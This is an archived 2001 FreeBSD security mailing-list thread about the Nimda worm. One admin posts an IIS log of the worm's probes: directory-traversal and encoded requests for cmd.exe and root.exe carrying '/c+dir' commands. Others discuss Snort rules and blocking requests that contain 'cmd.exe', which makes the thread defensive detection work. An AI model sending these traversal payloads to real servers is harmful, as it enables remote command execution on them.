Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 18 Sep 2001 14:54:36 -0700
From:      "John Howie" <JHowie@msn.com>
To:        "Derek O'Flynn" <derekoflynn@hotmail.com>, <freebsd-security@FreeBSD.ORG>, "Brett Glass" <brett@lariat.org>
Subject:   Re: NIMDA Virus
Message-ID:  <010a01c1408c$82bf0380$0101a8c0@development.local>
References:  <4.3.2.7.2.20010918153412.0493bc10@localhost>

next in thread | previous in thread | raw e-mail | index | archive | help
Probably not enough - the Hydra (two-heads) is also doing NetBIOS queries.
The example log below shows the entrire attack from an IIS standpoint. I
have no example of the NetBIOS attack pattern because we haven't been
infected.

john...

2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80
GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500
-




----- Original Message -----
From: "Brett Glass" <brett@lariat.org>
To: "Derek O'Flynn" <derekoflynn@hotmail.com>;
<freebsd-security@FreeBSD.ORG>
Sent: Tuesday, September 18, 2001 2:39 PM
Subject: Re: NIMDA Virus


> We just put a log monitor on the Apache server, and are firewalling
anything
> that sends a request with "cmd.exe" in it. Quite effective.
>
> --Brett
>
>
> At 03:31 PM 9/18/2001, Derek O'Flynn wrote:
>
> >Has anyone successfully written a rule for snort to alert to this?
> >
> >I'm currently running snort 1.8 with flex-resp.
> >
> >I would like to have a rule that identifies the attacks and then sends
the tcp_rst command so that the worm can't infect new machines.  I have the
information for the rule, just need to know what to put in the content field
to verify that it is nimda.
> >
> >Thanks,
> >Derek O'Flynn
> >
> >
> >_________________________________________________________________
> >Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp
> >
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?010a01c1408c$82bf0380$0101a8c0>